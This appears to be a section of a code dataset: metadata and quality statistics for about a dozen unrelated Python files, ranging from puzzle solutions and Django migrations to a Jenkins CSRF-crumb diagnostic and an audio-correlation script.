26,632
6.386409
0.081624
0.087767
0.052131
0.047598
0.781842
0.714789
0.658377
0.619027
0.559529
0.494302
0
0.006305
0.273393
26,632
657
261
40.535769
0.81448
0.010063
0
0.640212
0
0.001764
0.470215
0.159497
0
0
0
0
0
1
0.001764
false
0
0.001764
0
0.005291
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc09cc4c599dae963fa070fbe9dc0b9a5e9e17c9
1,425
py
Python
code/figure_warp.py
jwcarr/drift
a514c5970ba53025cc142257e953c1bda3cd049c
[ "CC-BY-4.0" ]
2
2021-11-19T10:12:58.000Z
2021-11-30T03:33:59.000Z
code/figure_warp.py
jwcarr/vertical_drift
5b4b6c475b5118950514dc01960391ef0d95bd19
[ "CC-BY-4.0" ]
null
null
null
code/figure_warp.py
jwcarr/vertical_drift
5b4b6c475b5118950514dc01960391ef0d95bd19
[ "CC-BY-4.0" ]
null
null
null
import numpy as np import eyekit import algorithms import core data = eyekit.io.load(core.FIXATIONS / 'sample.json') passages = eyekit.io.load(core.DATA / 'passages.json') original_sequence = data['trial_5']['fixations'] fixation_XY = np.array([fixation.xy for fixation in original_sequence], dtype=int) word_XY = np.array([word.center for word in passages['1B'].words(alphabetical_only=False)], dtype=int) start_times = np.array([i*100 for i in range(len(word_XY))], dtype=int) expected_sequence = eyekit.FixationSequence(np.column_stack([word_XY, start_times, start_times+100])) diagram = eyekit.vis.Image(1920, 1080) diagram.draw_text_block(passages['1B'], mask_text=True) diagram.draw_fixation_sequence(expected_sequence, color='#E32823', fixation_radius=6) diagram.draw_fixation_sequence(original_sequence, color='#205E84', fixation_radius=6) _, warping_path = algorithms.dynamic_time_warping(fixation_XY, word_XY) for fixation, mapped_words in zip(original_sequence, warping_path): for word_i in mapped_words: word_x, word_y = word_XY[word_i] diagram.draw_line(fixation.xy, (word_x, word_y), color='black', stroke_width=0.5, dashed=True) fig = eyekit.vis.Figure() fig.add_image(diagram) fig.set_crop_margin(2) fig.set_padding(vertical=2, horizontal=3, edge=1) fig.set_enumeration(False) fig.save(core.VISUALS / 'illustration_warp.pdf', width=83) # fig.save(core.FIGS / 'fig02_single_column.eps', width=83)
39.583333
102
0.781754
224
1,425
4.745536
0.424107
0.028222
0.022578
0.030103
0
0
0
0
0
0
0
0.031418
0.084211
1,425
35
103
40.714286
0.783142
0.04
0
0
0
0
0.061493
0.015373
0
0
0
0
0
1
0
false
0.115385
0.153846
0
0.153846
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc109f21dbb2efc4b477a59e275c911d6c56316e
221
py
Python
ABC/abc001-abc050/abc007/b.py
KATO-Hiro/AtCoder
cbbdb18e95110b604728a54aed83a6ed6b993fde
[ "CC0-1.0" ]
2
2020-06-12T09:54:23.000Z
2021-05-04T01:34:07.000Z
ABC/abc001-abc050/abc007/b.py
KATO-Hiro/AtCoder
cbbdb18e95110b604728a54aed83a6ed6b993fde
[ "CC0-1.0" ]
961
2020-06-23T07:26:22.000Z
2022-03-31T21:34:52.000Z
ABC/abc001-abc050/abc007/b.py
KATO-Hiro/AtCoder
cbbdb18e95110b604728a54aed83a6ed6b993fde
[ "CC0-1.0" ]
null
null
null
# -*- coding: utf-8 -*- def main(): a = input() # See: # https://www.slideshare.net/chokudai/abc007 if a == 'a': print('-1') else: print('a') if __name__ == '__main__': main()
13
48
0.466063
26
221
3.653846
0.730769
0
0
0
0
0
0
0
0
0
0
0.033333
0.321267
221
16
49
13.8125
0.6
0.312217
0
0
0
0
0.081081
0
0
0
0
0
0
1
0.125
false
0
0
0
0.125
0.25
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc11f9bf036f8314167de520f758c42b9fa4aa63
2,306
py
Python
designate-8.0.0/designate/tests/test_api/test_v2/test_limits.py
scottwedge/OpenStack-Stein
7077d1f602031dace92916f14e36b124f474de15
[ "Apache-2.0" ]
145
2015-01-02T09:35:53.000Z
2021-12-14T17:03:53.000Z
designate/tests/test_api/test_v2/test_limits.py
sapcc/designate
c3f084751006a2fe7562f137930542c4759d6fd9
[ "Apache-2.0" ]
6
2015-03-15T00:22:27.000Z
2019-12-16T09:37:38.000Z
designate/tests/test_api/test_v2/test_limits.py
sapcc/designate
c3f084751006a2fe7562f137930542c4759d6fd9
[ "Apache-2.0" ]
109
2015-01-13T16:47:34.000Z
2021-03-15T13:18:48.000Z
# Copyright 2013 Hewlett-Packard Development Company, L.P. # # Author: Kiall Mac Innes <kiall@managedit.ie> # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_config import cfg from designate.tests.test_api.test_v2 import ApiV2TestCase class ApiV2LimitsTest(ApiV2TestCase): def test_get_limits(self): response = self.client.get('/limits/') self.assertEqual(200, response.status_int) self.assertEqual('application/json', response.content_type) self.assertIn('max_zones', response.json) self.assertIn('max_zone_records', response.json) self.assertIn('max_zone_recordsets', response.json) self.assertIn('max_recordset_records', response.json) self.assertIn('min_ttl', response.json) self.assertIn('max_zone_name_length', response.json) self.assertIn('max_recordset_name_length', response.json) self.assertIn('max_page_limit', response.json) absolutelimits = response.json self.assertEqual(cfg.CONF.quota_zones, absolutelimits['max_zones']) self.assertEqual(cfg.CONF.quota_zone_records, absolutelimits['max_zone_recordsets']) self.assertEqual(cfg.CONF['service:central'].min_ttl, absolutelimits['min_ttl']) self.assertEqual(cfg.CONF['service:central'].max_zone_name_len, absolutelimits['max_zone_name_length']) self.assertEqual(cfg.CONF['service:central'].max_recordset_name_len, absolutelimits['max_recordset_name_length']) self.assertEqual(cfg.CONF['service:api'].max_limit_v2, absolutelimits['max_page_limit'])
41.927273
76
0.667823
274
2,306
5.448905
0.434307
0.072338
0.085733
0.112525
0.312793
0.251172
0.134628
0
0
0
0
0.009106
0.238075
2,306
54
77
42.703704
0.840637
0.270598
0
0.15625
0
0
0.183073
0.042617
0
0
0
0
0.5
1
0.03125
false
0
0.0625
0
0.125
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
1
fc1210baa0e8a8267a154dad6a47b17fe2942673
1,696
py
Python
pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGLContext/scenegraph/nodepath.py
alexus37/AugmentedRealityChess
7f600ad153270feff12aa7aa86d7ed0a49ebc71c
[ "MIT" ]
1
2015-07-12T07:24:17.000Z
2015-07-12T07:24:17.000Z
pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGLContext/scenegraph/nodepath.py
alexus37/AugmentedRealityChess
7f600ad153270feff12aa7aa86d7ed0a49ebc71c
[ "MIT" ]
null
null
null
pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGLContext/scenegraph/nodepath.py
alexus37/AugmentedRealityChess
7f600ad153270feff12aa7aa86d7ed0a49ebc71c
[ "MIT" ]
1
2016-02-19T21:55:53.000Z
2016-02-19T21:55:53.000Z
"""node-path implementation for OpenGLContext """ from vrml.vrml97 import nodepath, nodetypes from vrml.cache import CACHE from OpenGLContext import quaternion from OpenGL.GL import glMultMatrixf class _NodePath( object ): """OpenGLContext-specific node-path class At the moment this only adds a single method, transform() which traverses the path, calling transform() for each Transforming node which has a transform method. """ __slots__ = () def transform( self, mode=None, translate=1, scale=1, rotate=1 ): """For each Transforming node, do OpenGL transform Does _not_ push-pop matrices, so do that before if you want to save your current matrix. This method is useful primarily for storing paths to, for instance, bindable nodes, where you want to be able to rapidly transform down to the node, without needing a full traversal of the scenegraph. """ matrix = self.transformMatrix( translate=translate, scale=scale, rotate=rotate ) glMultMatrixf( matrix ) def quaternion( self ): """Get summary quaternion for all rotations in stack""" nodes = [ node for node in self if ( isinstance(node, nodetypes.Transforming) and hasattr( node, "orientation") ) ] q = quaternion.Quaternion() for node in nodes: q = q * quaternion.fromXYZR( *node.orientation ) return q class NodePath( _NodePath, nodepath.NodePath ): pass class WeakNodePath( _NodePath, nodepath.WeakNodePath ): pass
32
69
0.630896
192
1,696
5.526042
0.5
0.06032
0.035815
0.043355
0
0
0
0
0
0
0
0.004223
0.301887
1,696
52
70
32.615385
0.891892
0.373231
0
0.066667
0
0
0.011423
0
0
0
0
0
0
1
0.066667
false
0.066667
0.133333
0
0.366667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc188927db9f5bd43bd5abe64681e14292f26e08
269
py
Python
features/steps/basic_account_add_bdd.py
MhmdRyhn/behavior_test
868252e0b31596e0bff4a969745cf3b633c13695
[ "MIT" ]
null
null
null
features/steps/basic_account_add_bdd.py
MhmdRyhn/behavior_test
868252e0b31596e0bff4a969745cf3b633c13695
[ "MIT" ]
null
null
null
features/steps/basic_account_add_bdd.py
MhmdRyhn/behavior_test
868252e0b31596e0bff4a969745cf3b633c13695
[ "MIT" ]
null
null
null
import behave @behave.when('I add $1200 to my account') def add_usd_1200(context): context.account.add_cash(amount=1200) @behave.then('It becomes $3200 in my account') def check_for_increase_to_usd_1880(context): assert context.account.current_cash == 3200
22.416667
47
0.762082
43
269
4.55814
0.581395
0.091837
0.122449
0
0
0
0
0
0
0
0
0.102564
0.130112
269
11
48
24.454545
0.735043
0
0
0
0
0
0.204461
0
0
0
0
0
0.142857
1
0.285714
false
0
0.142857
0
0.428571
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
fc1b9449290073ccef5e51dfe2bdedbc18900050
7,035
py
Python
stats.py
jakeb1996/SBS
3bcc0017d22674d4290be1b272aeac4836f0d5ec
[ "MIT" ]
null
null
null
stats.py
jakeb1996/SBS
3bcc0017d22674d4290be1b272aeac4836f0d5ec
[ "MIT" ]
null
null
null
stats.py
jakeb1996/SBS
3bcc0017d22674d4290be1b272aeac4836f0d5ec
[ "MIT" ]
null
null
null
import matplotlib.pyplot as plt import argparse, csv, numpy, time, os, re def main(resultsFile, toolName): filesToCalc = [] toolNames = [] if os.path.isfile(resultsFile): # the user must have defined an exact file to plot filesToCalc.append(resultsFile) toolNames.append(toolName) else: # check if there are multiple files matching the criteria dir = (os.sep).join(resultsFile.split(os.sep)[:-1]) fileNameStart = resultsFile.split(os.sep)[-1] for (dirpath, dirnames, filenames) in os.walk(dir): for filename in filenames: reMatch = re.search('%s_((aggregate|system)|(\d)+)\\b' % fileNameStart, filename) if bool(reMatch): filesToCalc.append(os.path.join(dirpath, filename)) toolNames.append('%s %s' %(toolName, reMatch.group(1).title())) # start plotting i = 0 while i < len(filesToCalc): stat(filesToCalc[i], toolNames[i]) i = i + 1 def stat(resultsFile, toolName): print 'Running for: %s\n' % toolName TIME_ELAPSED = [] TIME_GAPS = [] config = { 'data-type-default' : int } # the aggregate functions to perform on each set. each is a function name. 
# user-defined functions at bottom of file stats = [len, min, q1, median, mean, q3, max, std] measurements = { # measurement configurations must appear in the order of the associated CSV columns # --- sample --- # 'stat_name' : { # ['data-type' : float,] # 'data' : [], # 'title' : 'measurement title' # }, # --- end sample --- ### START CHILD PROCESS STATS ### 'time' : { 'data' : [], 'data-type' : float, 'title' : 'Time' }, 'num_threads' : { 'data' : [], 'title' : 'Number of Threads' }, 'cpu_percent' : { 'data' : [], 'data-type' : float, 'title' : 'CPU Utilisation' }, 'mem_rss' : { 'data' : [], 'data-type' : float, 'title' : 'Resident Set Size (RSS) Memory Utilisation' }, 'mem_vms' : { 'data' : [], 'title' : 'Virtual Memory Size (VMS) Memory Utilisation' }, 'io_read_count' : { 'data' : [], 'title' : 'Disk IO Read Count' }, 'io_read_bytes' : { 'data' : [], 'title' : 'Disk IO Read Volume' }, 'io_write_count' : { 'data' : [], 'title' : 'Disk IO Write Count' }, 'io_write_bytes' : { 'data' : [], 'title' : 'Disk IO Write Volume' }, 'child_process_count' : { 'data' : [], 'title' : 'Child Process Count' }, ### START SYSTEM STATS ### # if the stat was defined above, then don't define it again 'mem_used' : { 'data' : [], 'data-type' : float, 'title' : 'Physical Memory Used (megabytes)' }, 'mem_avai' : { 'data' : [], 'data-type' : float, 'title' : 'Physical Memory Available (megabytes)', }, 'process_count' : { 'data' : [], 'title' : 'Process Count' } } # due to dictionaries not being in order, we need to know the order the data appears and # match it with the associated plot configuration above. 
headerOrder = [] # put all the times in a list timeRecords = [] with open(resultsFile, 'r') as fcsv: dataCsv = csv.reader(fcsv, delimiter=',') # Set the headerOrder and remove the time column header headerOrder = dataCsv.next() firstTime = None for row in dataCsv: # Elapsed time timeRecords.append(float(row[0])) TIME_ELAPSED.append(float(row[0]) - float(timeRecords[0])) if firstTime == False: TIME_GAPS.append(float(row[0]) - measurements['time']['data'][-1]) i = 0 # skip zero as its the time (as above) for measurement in headerOrder: if 'data-type' in measurements[measurement]: measurements[measurement]['data'].append(measurements[measurement]['data-type'](row[i])) else: measurements[measurement]['data'].append(config['data-type-default'](row[i])) i += 1 firstTime = False if len(timeRecords) == 0: print 'No data recorded in %s.\nExiting.\n\n' % resultsFile return 0 resultsFileName = '%s_stats.csv' % resultsFile with open(resultsFileName, 'w') as scsv: print 'Writing to file: %s' % resultsFileName # write headers line scsv.write('measurement,%s\n' % ','.join(map(funcName, stats))) for measurement in headerOrder: line = '%s' % measurement for stat in stats: line = ('%s,%s' % (line, stat(measurements[measurement]['data']))) scsv.write('%s\n' % line) # now, because the time gaps were calculated separately, run the stats on them tool # messy, I know. sorry! line = '%s' % 'time_gaps' for stat in stats: line = ('%s,%s' % (line, stat(TIME_GAPS))) scsv.write('%s\n' % line) # write start and end time scsv.write('start_time,%s,"%s"\nend_time,%s,"%s"\ntime_elapsed,%s,sec,%s,min' % (timeRecords[0], time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(timeRecords[0])), timeRecords[-1], time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(timeRecords[-1])), (timeRecords[-1] - timeRecords[0]), ((timeRecords[-1] - timeRecords[0]) / 60))) print '\nFinished.' 
def q1(seq): return numpy.percentile(seq, 25) def median(seq): return numpy.percentile(seq, 50) def mean(seq): return sum(seq) / len(seq) def q3(seq): return numpy.percentile(seq, 75) def std(seq): return numpy.std(seq) def funcName(func): return func.__name__ if __name__ == "__main__": parser = argparse.ArgumentParser(description = 'Plotter for the Software Benchmarking Script') parser.add_argument('-f', help='Results file as input (in csv format)') parser.add_argument('-t', help='Name of tool', default=None) parser.add_argument('--wincntxmnu', help='Indicates SBS stats was launched from the Windows context menu. See README for help.', action='store_true') args = parser.parse_args() # Not used #if args.wincntxmnu: # args.t = raw_input('Enter the plot prefix: ') main(args.f, args.t)
33.341232
338
0.519119
759
7,035
4.749671
0.329381
0.022191
0.021637
0.023578
0.147295
0.058807
0.058807
0.038835
0.038835
0.023301
0
0.007388
0.345842
7,035
210
339
33.5
0.775967
0.157072
0
0.194444
0
0.006944
0.198302
0.016299
0
0
0
0
0
0
null
null
0
0.013889
null
null
0.027778
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
fc1fa639ebbd112d3143f8455e253cf35ff2e2c9
1,033
py
Python
src/main/resources/scripts/crumbDiag.py
cam-laf/vectorcast-execution-plugin
fd54e8580886084d040d21fa809be8a609d44d8e
[ "MIT" ]
4
2019-06-28T22:46:06.000Z
2020-05-28T08:53:37.000Z
src/main/resources/scripts/crumbDiag.py
cam-laf/vectorcast-execution-plugin
fd54e8580886084d040d21fa809be8a609d44d8e
[ "MIT" ]
18
2018-09-26T15:32:11.000Z
2021-10-01T21:57:14.000Z
src/main/resources/scripts/crumbDiag.py
cam-laf/vectorcast-execution-plugin
fd54e8580886084d040d21fa809be8a609d44d8e
[ "MIT" ]
11
2017-03-19T18:37:16.000Z
2020-04-06T19:46:09.000Z
from __future__ import print_function import requests import sys import os verbose=True try: username=os.environ['USERNAME'] password=os.environ['PASSWORD'] except: print("Crumb Diaganostic requires USERNAME/PASSWORD to be set as environment variables") sys.exit(-1) jenkins_url=os.environ['JENKINS_URL'] url = jenkins_url + 'crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)' print(url) if username: crumb = requests.get(url, auth=(username, password)) if crumb.status_code == 200: crumb_headers = dict() crumb_headers[crumb.text.split(":")[0]] = crumb.text.split(":")[1] if verbose: print("Got crumb: %s" % crumb.text) else: print("Failed to get crumb") print("\nYou may need to enable \"Prevent Cross Site Request Forgery exploits\" from:") print("Manage Jenkins > Configure Global Security > CSRF Protection and select the appropriate Crumb Algorithm") print(jenkins_url + "/configureSecurity") sys.exit(-1)
35.62069
120
0.683446
131
1,033
5.29771
0.541985
0.057637
0.023055
0
0
0
0
0
0
0
0
0.008383
0.191675
1,033
28
121
36.892857
0.822754
0
0
0.074074
0
0
0.346563
0.062924
0
0
0
0
0
1
0
false
0.111111
0.148148
0
0.148148
0.296296
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc20aff0ea13fa9ee03eb24e8c0870f91ab872ab
219
py
Python
URI/1-Beginner/1099.py
vicenteneto/online-judge-solutions
4176e2387658f083b980d7b49bc98300a4c28411
[ "MIT" ]
null
null
null
URI/1-Beginner/1099.py
vicenteneto/online-judge-solutions
4176e2387658f083b980d7b49bc98300a4c28411
[ "MIT" ]
null
null
null
URI/1-Beginner/1099.py
vicenteneto/online-judge-solutions
4176e2387658f083b980d7b49bc98300a4c28411
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- for i in range(int(raw_input())): x, y = [int(x) for x in raw_input().split()] if x > y: x, y = y, x x += 1 if x % 2 == 0 else 2 print sum([j for j in range(x, y, 2)])
19.909091
48
0.465753
45
219
2.222222
0.466667
0.08
0
0
0
0
0
0
0
0
0
0.040816
0.328767
219
10
49
21.9
0.639456
0.09589
0
0
0
0
0
0
0
0
0
0
0
0
null
null
0
0
null
null
0.166667
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
fc241e5e9d6a198e302aa50f27135ed63d4ecd94
629
py
Python
day_ok/schedule/migrations/0027_auto_20210216_1337.py
bostud/day_ok
2bcee68252b698f5818808d1766fb3ec3f07fce8
[ "MIT" ]
null
null
null
day_ok/schedule/migrations/0027_auto_20210216_1337.py
bostud/day_ok
2bcee68252b698f5818808d1766fb3ec3f07fce8
[ "MIT" ]
16
2021-02-27T08:36:19.000Z
2021-04-07T11:43:31.000Z
day_ok/schedule/migrations/0027_auto_20210216_1337.py
bostud/day_ok
2bcee68252b698f5818808d1766fb3ec3f07fce8
[ "MIT" ]
null
null
null
# Generated by Django 3.1.6 on 2021-02-16 11:37 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('schedule', '0026_event'), ] operations = [ migrations.AlterField( model_name='group', name='students', field=models.ManyToManyField(blank=True, to='schedule.Student', verbose_name='Учні'), ), migrations.AlterField( model_name='teacher', name='subjects', field=models.ManyToManyField(blank=True, to='schedule.Subject', verbose_name='Предмети'), ), ]
26.208333
101
0.599364
63
629
5.904762
0.650794
0.107527
0.134409
0.155914
0.241935
0.241935
0.241935
0
0
0
0
0.041575
0.27345
629
23
102
27.347826
0.772429
0.071542
0
0.235294
1
0
0.154639
0
0
0
0
0
0
1
0
false
0
0.058824
0
0.235294
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc2653dfaa764320b8eb71e09ae9ebdeb59fea8c
287
py
Python
dynamic_programming/01/01-06.py
fumiyanll23/algo-method
d86ea1d399cbc5a1db0ae49d0c82e41042f661ab
[ "MIT" ]
null
null
null
dynamic_programming/01/01-06.py
fumiyanll23/algo-method
d86ea1d399cbc5a1db0ae49d0c82e41042f661ab
[ "MIT" ]
null
null
null
dynamic_programming/01/01-06.py
fumiyanll23/algo-method
d86ea1d399cbc5a1db0ae49d0c82e41042f661ab
[ "MIT" ]
null
null
null
# input N, M = map(int, input().split()) Ds = [*map(int, input().split())] # compute dp = [False] * (N+1) for ni in range(N+1): if ni == 0: dp[ni] = True for D in Ds: if ni >= D: dp[ni] = dp[ni] or dp[ni-D] # output print("Yes" if dp[-1] else "No")
17.9375
39
0.477352
52
287
2.634615
0.480769
0.116788
0.160584
0.233577
0
0
0
0
0
0
0
0.02
0.303136
287
15
40
19.133333
0.665
0.069686
0
0
0
0
0.019011
0
0
0
0
0
0
1
0
false
0
0
0
0
0.1
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc2e07191680875cf76ef21ec4089df4cb779bed
527
py
Python
exercise/migrations/0016_auto_20191025_1624.py
Arpit8081/Phishtray_Edited_Version
9f3342e6fd2620b7f01ad91ce5b36fa8ea111bc8
[ "MIT" ]
2
2020-03-31T12:38:10.000Z
2022-01-21T22:21:06.000Z
exercise/migrations/0016_auto_20191025_1624.py
Arpit8081/Phishtray_Edited_Version
9f3342e6fd2620b7f01ad91ce5b36fa8ea111bc8
[ "MIT" ]
252
2018-05-24T14:55:24.000Z
2022-02-26T13:02:10.000Z
exercise/migrations/0016_auto_20191025_1624.py
Arpit8081/Phishtray_Edited_Version
9f3342e6fd2620b7f01ad91ce5b36fa8ea111bc8
[ "MIT" ]
11
2018-06-23T14:54:42.000Z
2021-02-19T11:33:44.000Z
# Generated by Django 2.2.6 on 2019-10-25 16:24 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('exercise', '0015_exerciseemailproperties_date_received'), ] operations = [ migrations.AlterField( model_name='exercise', name='copied_from', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='exercise.Exercise'), ), ]
26.35
131
0.666034
60
527
5.733333
0.65
0.069767
0.081395
0.127907
0
0
0
0
0
0
0
0.046229
0.220114
527
19
132
27.736842
0.790754
0.085389
0
0
1
0
0.179167
0.0875
0
0
0
0
0
1
0
false
0
0.153846
0
0.384615
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc3188873ff10721356aeaf7e965132781c78f98
793
py
Python
level_one/strings.py
jameskzhao/python36
855e8a6e164065702efa7773da1f089454fdcbcc
[ "Apache-2.0" ]
null
null
null
level_one/strings.py
jameskzhao/python36
855e8a6e164065702efa7773da1f089454fdcbcc
[ "Apache-2.0" ]
null
null
null
level_one/strings.py
jameskzhao/python36
855e8a6e164065702efa7773da1f089454fdcbcc
[ "Apache-2.0" ]
null
null
null
#Basics a = "hello" a += " I'm a dog" print(a) print(len(a)) print(a[1:]) #Output: ello I'm a dog print(a[:5]) #Output: hello(index 5 is not included) print(a[2:5])#Output: llo(index 2 is included) print(a[::2])#Step size #string is immutable so you can't assign a[1]= b x = a.upper() print(x) x = a.capitalize() print(x) x = a.split('e') print(x) x = a.split() #splits the string by space print(x) x = a.strip() #removes any whitespace from beginning or the end print(x) x = a.replace('l','xxx') print(x) x = "Insert another string here: {}".format('insert me!') x = "Item One: {} Item Two: {}".format('dog', 'cat') print(x) x = "Item One: {m} Item Two: {m}".format(m='dog', n='cat') print(x) #command-line string input print("Enter your name:") x = input() print("Hello: {}".format(x))
22.027778
63
0.631778
150
793
3.34
0.426667
0.095808
0.097804
0.07984
0.0998
0.047904
0
0
0
0
0
0.011923
0.153846
793
36
64
22.027778
0.734724
0.320303
0
0.285714
0
0
0.280603
0
0
0
0
0
0
1
0
false
0
0
0
0
0.571429
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
fc35043bdda56bc264f387918b5687e34dea2849
1,152
py
Python
api/models/users.py
felipebarraza6/startup_comedy
42b4a4547bffc0d7cf34ace520355d80053bbd9e
[ "MIT" ]
null
null
null
api/models/users.py
felipebarraza6/startup_comedy
42b4a4547bffc0d7cf34ace520355d80053bbd9e
[ "MIT" ]
null
null
null
api/models/users.py
felipebarraza6/startup_comedy
42b4a4547bffc0d7cf34ace520355d80053bbd9e
[ "MIT" ]
null
null
null
"""User Model.""" # Django from django.db import models from django.contrib.auth.models import AbstractUser # Utilities from .utils import ApiModel class User(ApiModel, AbstractUser): email = models.EmailField( 'email', unique = True, ) USERNAME_FIELD = 'email' REQUIRED_FIELDS = ['username', 'first_name', 'last_name'] is_student = models.BooleanField(default=False) class Meta: verbose_name='Usuario' verbose_name_plural='Usuarios' def __str__(self): return self.username def get_short_name(self): return self.username class ProfileUser(ApiModel): user = models.OneToOneField(User, on_delete=models.CASCADE) approved_courses = models.ManyToManyField('api.ResultContest', related_name='user_aproved_courses', blank=True, null=True) tests_performed = models.ManyToManyField('api.ResultTest', related_name='user_result_test', blank=True) class Meta: verbose_name = 'Usuario - Perfil' verbose_name_plural = 'Usuarios - Perfiles' def __str__(self): return str(self.user)
24
71
0.667535
126
1,152
5.865079
0.492063
0.05954
0.043302
0.054127
0.073072
0
0
0
0
0
0
0
0.233507
1,152
47
72
24.510638
0.83692
0.025174
0
0.206897
0
0
0.138117
0
0
0
0
0
0
1
0.103448
false
0
0.103448
0.103448
0.689655
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
1
fc3a04cfd338f72934bd5d86f8126f4adfa55c05
1,330
py
Python
Compare.py
sushantPatrikar/WaveCompartor
112395287b41c1b5533924ebe293c5641647a5e3
[ "MIT" ]
3
2019-10-27T03:45:18.000Z
2022-02-21T18:50:58.000Z
Compare.py
sushantPatrikar/WaveComparator
112395287b41c1b5533924ebe293c5641647a5e3
[ "MIT" ]
null
null
null
Compare.py
sushantPatrikar/WaveComparator
112395287b41c1b5533924ebe293c5641647a5e3
[ "MIT" ]
1
2021-04-20T07:39:37.000Z
2021-04-20T07:39:37.000Z
from scipy.io import wavfile import numpy as np import pingouin as pg import pandas as pd _,data = wavfile.read('wav//ed//mp3baked.wav') _,data1 = wavfile.read('wav//ing//ingeating.wav') i= data.shape[0]-1 j = data1.shape[0]-1 index_1 = -1 index_2 = -1 try: data.shape[1] except IndexError: data = data.reshape(data.shape[0],1) try: data1.shape[1] except IndexError: data1 = data1.reshape(data1.shape[0],1) while True: if data[i,0] !=0 and index_1==-1: index_1 = i pass if data1[j,0] !=0 and index_2==-1: index_2 = j pass if index_1!=-1 and index_2!=-1: break i-=1 j-=1 data = data[-index_1:,:] data1 = data1[-index_2:,:] data = data[-2000:,:] data1= data1[-2000:,:] x =pg.corr(x=data[:,0],y=data1[:,0]) print(x) # print(data.tostring()) # print(data1.tostring()) # data = data[:,:] # data1 = data1[:,:] # data = data.reshape(data.shape[0],1) # data1 = data1.reshape(data1.shape[0],1) # data = data[-10000:,:] # data1 = data1[-10000:,:] # print(data1.shape[1]) # df = pd.DataFrame(data,data1) # print(df.head()) # print(data1.shape) # data = data[-5000:,:] # data1 = data1[-5000:,:] # # # x =pg.corr(x=data[:,0],y=data1[:,0]) # print(x)
15.647059
50
0.552632
201
1,330
3.597015
0.238806
0.077455
0.058091
0.045643
0.224066
0.224066
0.224066
0.071923
0.071923
0.071923
0
0.094378
0.251128
1,330
84
51
15.833333
0.631526
0.291729
0
0.171429
0
0
0.052443
0.052443
0
0
0
0
0
1
0
false
0.057143
0.114286
0
0.114286
0.028571
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc3d3b9be540fd17668cfe15a94b53ed79b67b0a
328
py
Python
UVa 10105 polynomial coefficients/sample/main.py
tadvi/uva
0ac0cbdf593879b4fb02a3efc09adbb031cb47d5
[ "MIT" ]
1
2020-11-24T03:17:21.000Z
2020-11-24T03:17:21.000Z
UVa 10105 polynomial coefficients/sample/main.py
tadvi/uva
0ac0cbdf593879b4fb02a3efc09adbb031cb47d5
[ "MIT" ]
null
null
null
UVa 10105 polynomial coefficients/sample/main.py
tadvi/uva
0ac0cbdf593879b4fb02a3efc09adbb031cb47d5
[ "MIT" ]
1
2021-04-11T16:22:31.000Z
2021-04-11T16:22:31.000Z
import sys import operator sys.stdin = open('input.txt') fact = [1, 1] for i in range(2, 15): fact.append(fact[-1] * i) while True: try: n, k = map(int, raw_input().split()) coef = map(int, raw_input().split()) except: break print fact[n] / reduce(operator.mul, [fact[c] for c in coef])
21.866667
65
0.579268
53
328
3.54717
0.603774
0.053191
0.095745
0.148936
0.202128
0
0
0
0
0
0
0.02449
0.253049
328
14
66
23.428571
0.742857
0
0
0
0
